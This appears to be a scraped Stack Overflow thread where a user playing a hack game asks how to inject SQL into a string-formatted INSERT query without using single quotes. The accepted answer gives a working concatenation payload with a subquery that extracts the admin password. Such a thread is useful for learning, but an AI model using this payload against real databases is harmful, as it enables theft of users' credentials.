SQL injection without single quotes

Question

Is there a way to do a SQL injection without using the single quote '?

I've looked to a lot of questions but they are all about single quote escaping or they do not contain a solution (SQL Injection after removing all single-quotes and dash-characters).

I'm doing a hack game and basically I have to extract a password from a db, I'm trying to do it by exploiting this query:

query = text("INSERT INTO data_table VALUES ([other values], '%s')" % data)
db.engine.execute(query, user=username)

trying to set data to:

'SELECT password FROM users WHERE username="admin" '

I think that this way the select should be executed and its result stored as data (I can easily read back that data from the website).

The problem is that when uploading the value that goes into data I cannot use the single quote ' (the system shows an error and I have to choose another value).

Is there a way to perform a similar injection without the single quote?

maybe you can encode the single quote, in html: ' in URL: %27 — st mnmn, May 17 '15 at 09:02
read this link:http://security.stackexchange.com/questions/37749/no-single-quotes-is-allowed-is-this-sql-injection-point-still-exploitable maybe you'll find a solution there — st mnmn, May 17 '15 at 09:15

score 0 · Accepted Answer · answered May 17 '15 at 10:45

0

This SELECT must be passed as a Scalar Subquery enclosed in parentheses.

If date is simply concatenated with text then setting it to

' || (SELECT password FROM users WHERE username='admin') || '

results in

INSERT INTO data_table VALUES ([other values], '' || (SELECT password FROM users WHERE username='admin') || '')

which is valid SQL concatenating empty strings and the result of the SELECT. Now the DBMS will happily execute it :-)

answered May 17 '15 at 10:45

dnoeth

59,503
4
39
56

I think in your phrase; you also started with a single quote ;). – shA.t May 17 '15 at 12:56
@shA.t: SQL injection doesn't care about rules like "no single quotes allowed" :-) – dnoeth May 17 '15 at 13:29
3

Yes, but I think the OP's question is about a way *without using the single quote* ;). – shA.t May 17 '15 at 13:32
@shA.t: IMHO the OP tried to set `data` to `'SELECT password FROM users WHERE username="admin" '` which failed due to the single quote and I showed him how to do it right. Let the OP decide... – dnoeth May 17 '15 at 13:42

SQL injection without single quotes

1 Answers1